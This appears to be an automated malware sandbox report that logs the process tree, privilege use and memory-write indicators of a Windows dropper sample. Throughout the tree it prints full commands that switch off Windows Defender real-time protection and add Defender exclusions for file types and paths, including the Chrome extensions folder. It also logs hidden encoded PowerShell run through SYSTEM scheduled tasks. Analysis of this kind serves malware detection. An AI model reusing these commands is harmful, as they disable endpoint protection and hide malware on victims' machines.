WMIC.exe Token: SeBackupPrivilege 2880 WMIC.exe Token: SeRestorePrivilege 2880 WMIC.exe Token: SeShutdownPrivilege 2880 WMIC.exe Token: SeSystemEnvironmentPrivilege 2880 WMIC.exe Token: SeUndockPrivilege 2880 WMIC.exe Token: SeManageVolumePrivilege 2880 WMIC.exe Token: SeDebugPrivilege 2724 powershell.EXE Token: SeDebugPrivilege 1016 powershell.exe Token: SeDebugPrivilege 2384 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2156 WMIC.exe Token: SeIncreaseQuotaPrivilege 2156 WMIC.exe Token: SeSecurityPrivilege 2156 WMIC.exe Token: SeTakeOwnershipPrivilege 2156 WMIC.exe Token: SeLoadDriverPrivilege 2156 WMIC.exe Token: SeSystemtimePrivilege 2156 WMIC.exe Token: SeBackupPrivilege 2156 WMIC.exe Token: SeRestorePrivilege 2156 WMIC.exe Token: SeShutdownPrivilege 2156 WMIC.exe Token: SeSystemEnvironmentPrivilege 2156 WMIC.exe Token: SeUndockPrivilege 2156 WMIC.exe Token: SeManageVolumePrivilege 2156 WMIC.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeAssignPrimaryTokenPrivilege 880 WMIC.exe Token: SeIncreaseQuotaPrivilege 880 WMIC.exe Token: SeSecurityPrivilege 880 WMIC.exe Token: SeTakeOwnershipPrivilege 880 WMIC.exe Token: SeLoadDriverPrivilege 880 WMIC.exe Token: SeSystemtimePrivilege 880 WMIC.exe Token: SeBackupPrivilege 880 WMIC.exe Token: SeRestorePrivilege 880 WMIC.exe Token: SeShutdownPrivilege 880 WMIC.exe Token: SeSystemEnvironmentPrivilege 880 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2944 wrote to memory of 3024 2944 1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe 28 PID 2944 wrote to memory of 3024 2944 1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe 28 PID 2944 wrote to memory of 3024 2944 1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe 28 PID 2944 wrote to memory of 3024 2944 1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe 28 PID 2944 wrote to memory of 3024 2944 1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe 28 PID 2944 wrote to memory of 3024 2944 1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe 28 PID 2944 wrote to memory of 3024 2944 1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe 28 PID 3024 wrote to memory of 2684 3024 Install.exe 29 PID 3024 wrote to memory of 2684 3024 Install.exe 29 PID 3024 wrote to memory of 2684 3024 Install.exe 29 PID 3024 wrote to memory of 2684 3024 Install.exe 29 PID 3024 wrote to memory of 2684 3024 Install.exe 29 PID 3024 wrote to memory of 2684 3024 Install.exe 29 PID 3024 wrote to memory of 2684 3024 Install.exe 29 PID 2684 wrote to memory of 2700 2684 Install.exe 30 PID 2684 wrote to memory of 2700 2684 Install.exe 30 PID 2684 wrote to memory of 2700 2684 Install.exe 30 PID 2684 wrote to memory of 2700 2684 Install.exe 30 PID 2684 wrote to memory of 2700 2684 Install.exe 30 PID 2684 wrote to memory of 2700 2684 Install.exe 30 PID 2684 wrote to memory of 2700 2684 Install.exe 30 PID 2700 wrote to memory of 2784 2700 cmd.exe 32 PID 2700 wrote to memory of 2784 2700 cmd.exe 32 PID 2700 wrote to memory of 2784 2700 cmd.exe 32 PID 2700 wrote to memory of 2784 2700 cmd.exe 32 PID 2700 wrote to memory of 2784 2700 cmd.exe 32 PID 2700 wrote to memory of 2784 2700 cmd.exe 32 PID 2700 wrote to memory of 2784 2700 cmd.exe 32 PID 2784 wrote to memory of 2692 2784 forfiles.exe 33 PID 2784 wrote to memory of 2692 2784 forfiles.exe 33 PID 2784 wrote to memory of 2692 2784 forfiles.exe 33 PID 2784 wrote to memory of 2692 2784 forfiles.exe 33 PID 2784 wrote to memory of 2692 2784 forfiles.exe 33 PID 2784 wrote to memory of 2692 2784 forfiles.exe 33 PID 2784 wrote to memory of 2692 2784 forfiles.exe 33 PID 2692 wrote to memory of 2660 2692 cmd.exe 34 PID 2692 wrote to memory of 2660 2692 cmd.exe 34 PID 2692 wrote to memory of 2660 2692 cmd.exe 34 PID 2692 wrote to memory of 2660 2692 cmd.exe 34 PID 2692 wrote to memory of 2660 2692 cmd.exe 34 PID 2692 wrote to memory of 2660 2692 cmd.exe 34 PID 2692 wrote to memory of 2660 2692 cmd.exe 34 PID 2700 wrote to memory of 2608 2700 cmd.exe 35 PID 2700 wrote to memory of 2608 2700 cmd.exe 35 PID 2700 wrote to memory of 2608 2700 cmd.exe 35 PID 2700 wrote to memory of 2608 2700 cmd.exe 35 PID 2700 wrote to memory of 2608 2700 cmd.exe 35 PID 2700 wrote to memory of 2608 2700 cmd.exe 35 PID 2700 wrote to memory of 2608 2700 cmd.exe 35 PID 2608 wrote to memory of 1160 2608 forfiles.exe 36 PID 2608 wrote to memory of 1160 2608 forfiles.exe 36 PID 2608 wrote to memory of 1160 2608 forfiles.exe 36 PID 2608 wrote to memory of 1160 2608 forfiles.exe 36 PID 2608 wrote to memory of 1160 2608 forfiles.exe 36 PID 2608 wrote to memory of 1160 2608 forfiles.exe 36 PID 2608 wrote to memory of 1160 2608 forfiles.exe 36 PID 1160 wrote to memory of 2904 1160 cmd.exe 37 PID 1160 wrote to memory of 2904 1160 cmd.exe 37 PID 1160 wrote to memory of 2904 1160 cmd.exe 37 PID 1160 wrote to memory of 2904 1160 cmd.exe 37 PID 1160 wrote to memory of 2904 1160 cmd.exe 37 PID 1160 wrote to memory of 2904 1160 cmd.exe 37 PID 1160 wrote to memory of 2904 1160 cmd.exe 37 PID 2700 wrote to memory of 2512 2700 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe"C:\Users\Admin\AppData\Local\Temp\1cf4a727049f058512438e8664b50e63dc3909c574e67eeb418ae11f38c08ace.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\7zS1D02.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\7zS1EB7.tmp\Install.exe.\Install.exe /HezbdidIuGUh "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2692 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2660
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:1160 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2904
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:2512
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2120
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2620
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2664
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2812
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2800
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:2804
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2616
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:2836
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:2872
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bLzeoVMxrLqUlFeJJd" /SC once /ST 19:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC\zBUIVtcygSckkyZ\vXXWSIg.exe\" ks /asFdidTNMk 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2316
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bLzeoVMxrLqUlFeJJd"4⤵PID:1680
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bLzeoVMxrLqUlFeJJd5⤵PID:1272
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bLzeoVMxrLqUlFeJJd6⤵PID:1800
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 4804⤵
- Loads dropped DLL
- Program crash
PID:2156
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A915DA4A-6A9A-4B3A-BB99-735B6AA26FA1} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC\zBUIVtcygSckkyZ\vXXWSIg.exeC:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC\zBUIVtcygSckkyZ\vXXWSIg.exe ks /asFdidTNMk 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1288
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1532
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1556
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1588
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:636
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:836
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:1756
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2092
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1388
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1120
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1924
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:1352
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2016
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:1424
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2920
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:2912
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggNAKuPqD" /SC once /ST 04:01:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggNAKuPqD"3⤵PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggNAKuPqD"3⤵PID:884
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2324
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:292
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1508
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gqWIXJofh" /SC once /ST 09:58:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gqWIXJofh"3⤵PID:2168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gqWIXJofh"3⤵PID:2672
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:1660
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2640
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2880
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:323⤵PID:2860
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:643⤵PID:1676
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:323⤵PID:2884
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:324⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:643⤵PID:2736
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\xWvzdveufkqfSjMY" /t REG_DWORD /d 0 /reg:644⤵PID:2872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\xWvzdveufkqfSjMY\cuLzxDsX\alFSuZhntTQMVGEE.wsf"3⤵PID:2844
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\xWvzdveufkqfSjMY\cuLzxDsX\alFSuZhntTQMVGEE.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1276 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1800
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FtTPlVLhSaUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OOuPExCnaYTU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OOuPExCnaYTU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpUBPkkqU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mpUBPkkqU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rHfQGqiujvxkYJuQWHR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQtOyvtwIjTyC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tQtOyvtwIjTyC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HNIqBcslfBUMDlVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\HNIqBcslfBUMDlVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\AqxqdgaLLZTMdtrEC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:408
-
-
